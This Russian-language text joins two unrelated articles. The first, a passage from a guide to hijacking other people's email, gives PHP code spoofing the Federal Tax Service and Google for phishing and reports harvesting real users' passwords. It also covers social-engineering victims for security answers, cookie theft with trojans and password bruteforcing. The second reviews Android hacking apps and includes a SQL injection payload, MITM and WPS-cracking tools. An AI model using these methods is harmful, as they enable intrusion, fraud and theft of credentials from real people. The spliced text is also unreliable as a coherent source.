С другой стороны, можно попытаться отправить сообщение и через собственный хостинг (не обязательно устанавливать локальный веб-сервер). Все зависит от его настроек. Мы, например, для выполнения сценария отправки нашего сообщения использовали наш хостинг. На нем функция mail() выполнилась без особых нареканий. Понятно, что если просмотреть все заголовки письма, «след» приведет к нам. Но для нас сейчас это не важно. Сейчас важно, чтобы в почтовом клиенте поле «От» содержало то, что нам нужно. В первом способе мы поступили именно так, то есть для отправки сообщения использовали функцию mail().

СтандартнаяPHP-функция mail() позволяет с легкостью указать, как текст письма, так и его заголовки. Например:

$headers = "From: Федеральная налоговая служба " ."rn" . "Reply-To: [email protected]" . "rn"; mail($to, $subject, $message, $headers); $headers = "From: Google " ."rn" . "Reply-To: [email protected]" . "rn"; mail($to, $subject, $message, $headers);

. "rn" . "Reply-To: [email protected]" . "rn" ; mail ($to , $subject , $message , $headers ) ;

Письма, отправленные таким образом, миновали антиспам Google (не попали в папку Спам) и нормально отображались, как в почтовом клиенте (проверялось в Outlook и The Bat!), так и в веб-интерфейсе. Конечно, перед отправкой сообщения жертве лучше отправить его на свой ящик и убедиться, что письмо отображается правильно, как минимум, что почтовый клиент правильно определяет кодировку. Если это не так, в $headers нужно добавить заголовки, описывающие кодировку письма.

Определенные результаты при использовании этого метода мы получили. Некоторые из пользователей оставили свои реальные пароли. Некоторые не отреагировали на это письмо и обратились к администратору. А некоторые догадались, в чем дело и вместо пароля ввели абракадабру. Столь посредственные результаты обусловлены тем, что мы не готовились особо и сделали и форму входа, и само письмо весьма некачественно. Но все же мы получили несколько реальных паролей, так что этот метод работает, не смотря на весь скептицизм.

Эффективность: высокая
Сложность: высокая
Стоимость: высокая

Способ 6: изучаем жертву и «вспоминаем» пароль

Теперь попробуем вспомнить то, что никогда не знали - пароль от почтового ящика жертвы. Очень часто почтовые службы позволяют восстановить забытый вопрос. А чтобы убедиться, что пользователь, пытающийся восстановить доступ к ящику, является его владельцем, почтовая служба задает контрольный вопрос, указанный при регистрации почтового ящика (рис. 22). Если вы пытаетесь взломать ящик знакомого вам человека, то есть вероятность, что вы уже знаете ответ на этот вопрос. Если же вы взламываете пароль чужого человека, то первое, что нужно сделать - это заняться изучением жертвы.

Рис. 22. Восстановление пароля на Яндексе

Чем больше вы соберете информации о жертве, тем проще будет взломать почтовый ящик. Информацию можно собирать разными способами - можно втереться в доверие к самой жертве и выведать как бы случайно у него нужную вам информацию (например, девичью фамилию матери, см. рис. 22), а можно подружиться с друзьями жертвы. Благо, социальные сети позволяют быстро найти не только жертву, но и ее друзей.

Эффективность: высокая
Сложность: средняя
Стоимость: низкая

Способ 7: XSS-уязвимости

Один из способов взлома электронной почты - это использование XSS-уязвимостей. Вот только вряд ли можно назвать его эффективным. Во-первых, все найденные XSS-уязвимости в популярных почтовых сервисах очень быстро устраняются. Во-вторых, учитывая «во-первых», искать XSS-уязвимость придется самому (ведь все найденные уязвимости уже закрыты). А на поиск потребуется определенное время. Да и реализация атаки через XSS-уязвимость требует повышенной квалификации. Как вариант, этот метод можно рассмотреть. Сугубо из академического интереса. Но если нужно побыстрее взломать почту, тот же социальный инженеринг окажется более эффективным. Если хочется посмотреть на взлом посредством XSS, можете ознакомитьсявот с этой статьей . В ней описано, как увести чужие куки. Если развить тему, то можно подменить свои cookies на чужие и заполучить доступ к чужому ящику.

Эффективность: низкая
Сложность: высокая
Стоимость: низкая

Способ 8: кража Cookies

Еще один неплохой способ взломать почту - это кража Cookies. Конечно, он эффективен, если жертва хранит свои пароли в браузере. Даже если вы не получите пароль к почтовому ящику, вы можете получить пароли к другим сервисам. Пользователи часто используют одни и те же пароли для доступа к разным сервисам. Поэтому если вы найдете пароль к одному сервису (например, к блогу, форуму), вы можете попытаться его использовать при входе в почтовый аккаунт. Есть вероятность, что он подойдет.

Как украсть «куки»? Существуют различные способы - от использования трояна (см. рис. 23) до банального копирования на флешку или свой FTP, если вы оказались за компьютером жертвы. Под рукой нет приложения для получения паролей (см. способ 3)? Не беда! Можно просто скопировать каталог с Cookies и проанализировать на своем компьютере. Для анализа Cookies можно использовать самые разные утилиты, одна из которыхCookieSpy , которая поддерживает не только установленные, но и portable-браузеры, что позволяет «подсунуть» программе каталог с Cookies (рис. 24)

Рис. 23. Кража куков с помощью трояна

Рис. 24. Анализ Cookies программой CookieSpy

Эффективность: средняя
Сложность: высокая
Стоимость: низкая

Способ 9: bruteforce

Самый неэффективный способ. Он заключается в переборе пароля по списку. Программа просто пытается подобрать пароль методом «тыка» (он же метод Коши). Конечно, в идеальных условиях у нее это рано или поздно получится. Но практически все сервисы заблокируют почтовый ящик после 3-5 неудачных попыток. Поэтому вряд ли у вас получится использовать «метод грубой силы». Если вам таки хочется попытаться, тогда можете попробовать использовать утилиту Brutus, использование которой обсуждается наhackerthreads .
Есть и еще одна довольно популярная утилита -THC-Hydra , позволяющая взломать самые различные сервисы: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP.

Эффективность: низкая
Сложность: средняя
Стоимость: низкая

Способ 10: обратиться к профессионалам

В Интернете не составит труда найти контакты «профессионала», занимающегося взломом почты. Это самый простой способ. Его эффективность зависит от правильности выбора специалиста. Преимущество в том, что за вас будет выполнено практически все, что описано в этой статье (может чуть больше, а может чуть меньше) и вам самому ничего не придется делать. Недостаток - «хакер» может оказаться элементарным мошенником. В итоге ни взломанного почтового ящика, ни денег. В Интернете есть даже специальные форумы, где можно с легкостью найти «специалиста» (рис. 25). Адрес форума мы специально затерли, чтобы не делать никому лишней рекламы. Однако при желании и умении пользоваться поисковиком вы с легкостью найдете не только этот форум, но и сотни других подобных ему.

Пентест или по простому тесты на проникновение — легальный способ заниматься настоящим взломом, да еще и получать за это деньги. Продвинутый аудит безопасности обычно выполняется на ноутбуке с и специфическим оборудованием, но многие бреши в безопасности легко обнаружить и с помощью обычного смартфона и планшета. В этой статье мы рассмотрим 14 хакерских приложений, которые позволят вам выполнить пентест с помощью Андроид, не вытаскивая ноутбук.

Статья написана в исследовательских целях. Вся информация носит ознакомительный характер. Ни автор статьи, ни администрация не несет ответственности за неправомерное использование упомянутых в статье программ.

Хакерские программы для взлома со смартфона

Все хакерские приложения для Андроид делятся на несколько групп:

• Сканеры веб-ресурсов — хакерские утилиты для поиска уязвимостей.
• Комбайны — позволяют искать уязвимости (и эксплоиты для них) как в программной части так и в железе. Выполняют сниффинг, MITM-атаки, и т.д.
• Снифферы — хакерские приложения для перехвата и анализа трафика.
• Вспомогательные утилиты — инструменты помогающие в пентесте.
• Справочники и поисковики — приложения выполняющие вспомогательные функции.

Сканеры веб-ресурсов для Android

Начнем обзор программ для взлома смартфона с самого главного, а именно со сканеров веб-приложений. Здесь у нас три приложения, которые позволят вам найти открытые админки, сбрутить пароль, протестировать сайт на XSS-уязвимости, возможность SQL-инъекций, составить листинги каталогов и многое другое.

Мобильный сканер уязвимостей веб-приложений Kayra the Pentester Lite ищет типичные ошибки в конфигурации указанного веб-сервера и пытается получить листинг каталогов (обычно - успешно). Среди дополнительных инструментов есть генератор хешей и дешифровщик AES.
Приложение обладает простыми и понятными настройками. Поддерживает HTTPS и проверяет корректность TLS. Умеет искать XSS, брутить CGI и выполнять атаки по словарю. Может работать в фоне и в многопоточном режиме. Содержит базу данных Google Hacks и автоматически определяет известные уязвимости.

Отчет Kayra и экран About

По каждому пункту, отмеченному в настройках сканирования, создается подробный отчет. На скриншоте видно лишь его малую часть. Бесплатная версия довольно функциональна, но иногда раздражает рекламой. В платной версии нет рекламы и ограничений, ее стоимость на момент написания статьи составляет 159 рублей.

• Протестированная версия: 1.4.0
• Размер: 4,7 Мбайт
• Версия Android: 4.1 и выше
• Требуется root: нет

Следующая хакерская программа для Android — это DroidSQLi. Приложение DroidSQLi служит для проверки веб-сайтов на уязвимость к SQL-инъекциям четырех разновидностей:

• Normal SQL injection - классический вариант с передачей параметра UNION ALL SELECT;
• Error based SQL injection - использование в запросах заведомо неверного синтаксиса для получения сообщения об ошибке, раскрывающего дополнительные параметры БД;
• Blind SQL injection - серия запросов с анализом ответов true/false от СУБД, позволяющая восстановить структуру базы данных;

Time based SQL injection - формирование дополнительных запросов, вызывающих приостановку СУБД на определенное время, что делает возможным посимвольное извлечение данных.

Демонстрация error based SQL-инъекции

Утилита DroidSQLi автоматически подбирает метод инжекта, а также использует техники обхода фильтрации запросов.

Для начала тестирования сайта необходимо вручную найти точку входа. Обычно это адрес веб-страницы, содержащий запрос вида?id=X или?p=X, где X - целое положительное число. В нашем примере пейлоад для параметра id выглядит так:

id = (SELECT 4777 FROM (SELECT COUNT (* ) , CONCAT (0x71626b6a71 , (SELECT (ELT (4777 = 4777 , 1 ) ) ) , 0x7170767871 , FLOOR (RAND (0 ) * 2 ) ) x FROM INFORMATION_SCHEMA . PLUGINS GROUP BY x ) a )

В Сети очень много сайтов, уязвимых к SQL-инъекциям. Думаю, вы легко найдете несколько таких, просто посмотрев историю своего браузера.

• Протестированная версия: 1.1
• Размер: 705 Кбайт
• Версия Android: 4.2 и выше
• Требуется root: нет

Следующий инструмент для взлома со смартфонов — это утилита Droidbug Admin Panel Finder FREE. Приложение ищет админские панели по дефолтным адресам разных CMS. Результат ее работы не всегда соответствует реальному положению вещей, поскольку на популярных веб-серверах стоят IDS и WAF. Они блокируют перебор URL или перенаправляют его в honeypot (ловушку), который отвечает HTTP 200 OK на все запросы, а сам собирает инфу об атакующем.

Однако на менее популярных сайтах с безопасностью все очень тоскливо, и валидная админская панелька находится за считанные секунды. В платной версии, стоимостью 139 рублей, убрана реклама и разблокирована возможность перебора по смешанному шаблону для сайтов с поддержкой PHP/ASP/CGI/CFM/JS.

Поиск админки на сайте

• Протестированная версия: 1.4
• Размер: 6,3 Мбайт
• Версия Android: 2.1 и выше
• Требуется root: нет

Комбайны для взлома со смартфона

Интернет состоит не только из веб-приложений, и дыры находят не только в них. Следующая подборка хакерских приложений для Андроид позволит вам искать уязвимости (и эксплоиты для них) в софте и железе, выполнять сниффинг, MITM-атаки, оставлять и делать много других интересных вещей.

cSploit — это дин из самых функциональных инструментов для сканирования сетей и поиска уязвимостей на обнаруженных хостах. Составляет карту сети и отображает сведения обо всех найденных в ней устройствах. Умеет определять их IP/MAC и вендора (по первым трем октетам MAC-адреса), определять установленную на них ОС, искать уязвимости с помощью Metasploit framework RPCd и брутфорсить пароли.

Поиск клиентов и MITM-атака

Выполняет MITM-атаки разного типа через спуфинг DNS (возможна замена медиафайлов в трафике на лету, JS-инжекты, угон сессий и захват cookie для авторизации без ввода пароля). Также умеет дисконнектить отдельные устройства (или отключать их скопом от точки доступа). Перехватывает трафик и сохраняет его в формате.pcap или перенаправляет, куда пожелаете.

cSploit содержит инструмент для создания и отправки на выбранный хост любого TCP/UDP-пакета. По ссылке перенаправляет на онлайн-сервис для выбора и эксплуатации уязвимостей под определенную модель. База перестала обновляться в 2015 году, но все еще сохраняет актуальность. В моем кратком тесте на роутере ASUS, который выпускается с конца 2016 года, в свежей прошивке (апрель 2018 года) была обнаружена уязвимость, впервые описанная в 2009 году.

Открытые порты и подборка эксплоитов для выбранной цели

Дополнительно cSploit помогает создать на взломанном прошедшем аудит безопасности хосте удаленный и получить над ним полный контроль. В общем, это однозначный must have для пентестеров, и не только для них.

• Протестированная версия: 1.6.6 RC2
• Размер: 3,5 Мбайт
• Тестовые сборки cSploit Nightly доступны
• Версия Android: 2.3 и выше
• Требуется рут: ДА!
• в /system/bin

cSploit, Intercepter-NG и другие мощные утилиты заслуживают более подробного рассмотрения в отдельных статьях. Мы предлагаем сперва освоиться с базовыми принципами пентеста на примере простых приложений, а уже затем переходить на хардкор.

Форк cSploit от Симоне Маргарителли (Simone Margaritelli), приказавший долго жить в 2014 году. Проект так и остался в стадии бета-версии с очень сырым кодом. Если cSpoit у меня работал без нареканий, то последние три версии dSploit вываливались с ошибкой почти сразу после запуска.

Тот же cSploit, вид сбоку

С тех пор как Маргарителли устроился в компанию Zimperium, наработки dSploit вошли в состав фирменной утилиты zAnti.

Сканирование беспроводной сети и обнаружение хостов

• Протестированная (не вполне удачно) версия: 1.1.3с
• Размер: 11,4 Мбайт
• Версия Android: 2.3 и выше
• Требуется root: ДА!
• Дополнительные требования: установить BusyBox в /system/bin, проявить склонность к мазохизму

zAnti

Мобильное приложение для пентеста от Zimperium. Более современный, стабильный и наглядный аналог dSploit.

Интерфейс zAnti разделен на две части: сканирование и MITM. В первой секции он, подобно dSploit и оригинальному cSploit, мапит сеть, определяет все хосты, их параметры и уязвимости.

Nmap’им сеть

Отдельная функция - определение уязвимостей на самом смартфоне. Согласно отчету программы, наш тестовый Nexus 5 содержит 263 дыры, которые уже не будут закрыты, поскольку срок жизни девайса истек.

Обнаружение уязвимостей

zAnti помогает взламывать роутеры и получать к ним полный доступ (с возможностью сменить пароль админа, задать другой SSID, PSK и так далее). Используя MITM-атаки, zAnti выявляет небезопасные элементы на трех уровнях: в ОС, приложениях и настройках устройства.

Ключевая особенность - формирование подробного отчета по всем просканированным элементам. Отчет содержит пояснения и советы по устранению найденных недостатков.

Отчет zAnti

• Протестированная версия: 3.18
• Размер: 24 Мбайт
• Версия Android: 2.3 и выше
• Требуется рут: ДА!
• Примечания: zAnti не работает на устройствах с процессорами архитектуры x86 и x86_64

Снифферы для перехвата трафика на Android

Ни одному пентестеру не обойтись без хорошего . Это такой же обыденный инструмент, как нож на столе повара. Поэтому следующий раздел статьи посвящен приложениям для перехвата и анализа трафика.

— это продвинутый сниффер, ориентированный на выполнение MITM-атак. Захватывает трафик и анализирует его на лету, автоматически определяя в нем данные авторизации. Умеет сохранять перехваченный трафик в формате.pcap и анализировать его позже.

Среди автоматически определяемых форматов данных есть пароли и хеши для следующих протоколов: AIM, BNC, CVS, DC++, FTP, HTTP, ICQ, IMAP, IRC, KRB5, LDAP, MRA, MYSQL, NTLM, ORACLE, POP3, RADIUS, SMTP, SOCKS, Telnet, VNC.

Сканирование и ARP spoofing

Intercepter-NG собирает из перехваченных пакетов файлы, передаваемые по FTP, IMAP, POP3, SMB, SMTP и HTTP.Как cSploit и аналоги, Intercepter-NG использует ARP-спуфинг для выполнения MITM. Он поддерживает SSLstrip, что позволяет выполнять MITM-атаки даже с HTTPS-трафиком, подменяя на лету HTTPS-запросы атакуемых хостов их HTTP-вариантами через встроенный DNS-прокси.

Вдобавок он умеет определять ARP-спуфинг в отношении себя (полезно при подключении к публичным хотспотам) и защищать от него. При нажатии иконки в виде зонтика проверяется ARP-кеш.

• Протестированная версия: 2.1 (консольная - 0.8)
• Размер: 5,2 Мбайт
• Версия Android: 2.3 и выше
• Требуется рут: ДА!
• Дополнительные требования: установить BusyBox в /system/bin

Более простой и «легальный» анализатор TCP/UDP-пакетов с возможностью перехвата HTTPS-сессий посредством MITM. Не требует , поскольку использует встроенную в Android функцию проксирования трафика через и подмену SSL-сертификата.

В Android 6.0.1 и более свежих версиях требуется вручную добавить CA-сертификат через настройки приложения.

Захват трафика

Packet Capture работает локально. Он не выполняет ARP-спуфинг, угон сессий и прочие атаки на внешние хосты. Приложение позиционируется как для отладки и скачивается из официального маркета. Умеет декодировать пакеты как Text/Hex/Urlencoded, но пока не поддерживает сжатые (gzip) HTTP-запросы.

С помощью Packet Capture удобно контролировать сетевую активность установленных приложений. Он показывает не просто объем передаваемого трафика, а что конкретно и куда отправляет каждая программа или встроенный компонент Android, какие пакеты и с каких серверов получает в ответ. Отличная утилита для поиска троянских закладок и назойливой рекламы.

• Протестированная версия: 1.4.7
• Размер: 4,5 Мбайт
• Версия Android: 2.3 и выше
• Требуется root: нет

Вспомогательные хакерские утилиты для Android

Если продвинутые утилиты для пентеста требуют root и BusyBox, то приложения попроще доступны в Play Store и работают на любом смартфоне без ухищрений. ARP-спуфинг и MITM-атаки ими не выполнить, но для сканирования беспроводной сети, обнаружения хостов и явных проблем с безопасностью их вполне хватает.

Эта программа сканирует эфир в поисках точек доступа с включенной функцией WPS. Обнаружив такие, она пытается опробовать на них дефолтные пины. Их немного, и они известны из мануалов производителей роутеров.

Если пользователь не сменил дефолтный пин и не отключил WPS, то утилита самое большое за пять минут перебирает все известные значения и получает WPA(2)-PSK, каким бы длинным и сложным он ни был. Пароль от беспроводной сети отображается на экране и автоматически сохраняется в настройках Wi-Fi смартфона.

Обнаружение хотспотов с WPS

С момента выхода той статьи WPSApp обновилась и стала лучше во всех отношениях. Она знает больше пинов разных вендоров, быстрее перебирает их и научилась брутфорсить в новых режимах. Утилита работает как на рутованных смартфонах, так и без прав root. У нее много аналогов, но все они куда менее эффективные.

• Протестированная версия: 1.6.20
• Размер: 3,0 Мбайт
• Версия Android: 4.1. Гораздо лучше работает на Android 5.1 и новее
• Требуется root: желательно, но не обязательно

Опенсорсный и бесплатный сканер Wi-Fi-сетей. Очень удобная утилита для обнаружения точек доступа (включая скрытые), выяснения их параметров (MAC, вендор, канал, тип шифрования), оценки мощности сигнала и расстояния до них. Удаленность от роутера вычисляется по формуле для прямой видимости, поэтому не всегда указывается достаточно точно.

Отображение скрытых сетей и оценка зашумленности каналов

WiFiAnalyzer позволяет наглядно увидеть ситуацию в эфире, отфильтровать цели по уровню сигнала, SSID, используемой частоте (2,4/5 ГГц) и типу шифрования. Также вручную можно определить наименее зашумленный канал по графикам двух типов: обычному и с временным накоплением.

Словом, WiFiAnalyzer - это то, с чего стоит начинать разведку в беспроводных сетях. Поиск целей с определенными параметрами сэкономит кучу времени при дальнейшей работе с продвинутыми утилитами.

• Протестированная версия: 1.8.11
• Размер: 1,6 Мбайт
• Версия Android: 4.1 и выше
• Требуется root: нет

Fing

Часто функциональность хакерских утилит пересекается с возможностями вполне легальных инструментов, которыми пользуются системные администраторы для наладки сетей.

Fing - один из таких инструментов. Он быстро сканирует Wi-Fi-сеть, к которой вам удалось подключиться (например, с помощью WPSApp), и определяет все хосты. Это может быть востребовано для проверки собственной беспроводной сети на предмет НСД, но, согласитесь, исследовать незнакомые сети гораздо интереснее.

Определение портов и сервисов на выбранных хостах

Fing выполняет расширенный анализ имен NetBIOS, UPNP и Bonjour, поэтому точнее определяет типы устройств и показывает больше их свойств. В Fing интегрированы утилиты ping и tracerout. Также он умеет отправлять запросы WOL (Wake on LAN), удаленно пробуждая «спящие» устройства, поддерживающие эту функцию.

Fing автоматически определяет открытые порты и сопоставленные им сервисы. При обнаружении SMB, SSH, FTP и прочего Fing предлагает подключиться к ним, вызывая для этого внешние программы из своего меню. Если соответствующая утилита (например, AndSMB) не установлена, то Fing открывает ссылку на ее загрузку.

Дополнительные возможности программы открываются после регистрации аккаунта Fing. С ним можно выполнять инвентаризацию устройств и сетей. Еще больше функций открывается после приобретения аппаратного Fingbox. Он умеет отслеживать подключение непрошеных гостей и выборочно блокировать их устройства, а также проверять интернет-подключение на типичные неполадки и автоматически устранять их.

• Протестированная версия: 6.7.1
• Размер: 10 Мбайт
• Версия Android: 4.1 и выше
• Требуется root: нет

Приложение определяет все клиентские устройства в беспроводной сети, а затем использует ARP-спуфинг для их выборочного отключения или обрубает связь для всех, кроме себя. А дальше вы можете скачивать файлы на полной скорости где-нибудь в кафешке, глядя, как мучаются другие посетители.

NetCut - найти и кикнуть!

Шутка! Так делать некультурно, а вот быстро кикнуть злоумышленника, не влезая в настройки роутера, - почему бы и да? Можно не просто разово оборвать связь для любого хоста, а постоянно блокировать его попытки подключиться к точке доступа, пока он не сменит MAC-адрес (см. вкладку Jail).

Если кто-то попытается сделать такой финт в отношении твоего девайса, NetCut определит отравление ARP-кеша и очистит его (см. NetCut Defender). За доллар в месяц можно получить аккаунт Pro, убрать рекламу и ограничения.

• Протестированная версия: 1.4.9
• Размер: 12 Мбайт
• Версия Android: 4.0 и выше
• Требуется root: ДА!

Справочники и поисковики для пентестера

Напоследок расскажем о паре полезных утилит, которые не имеют прямого отношения к взлому, а выполняют скорее вспомогательную и информационную функцию.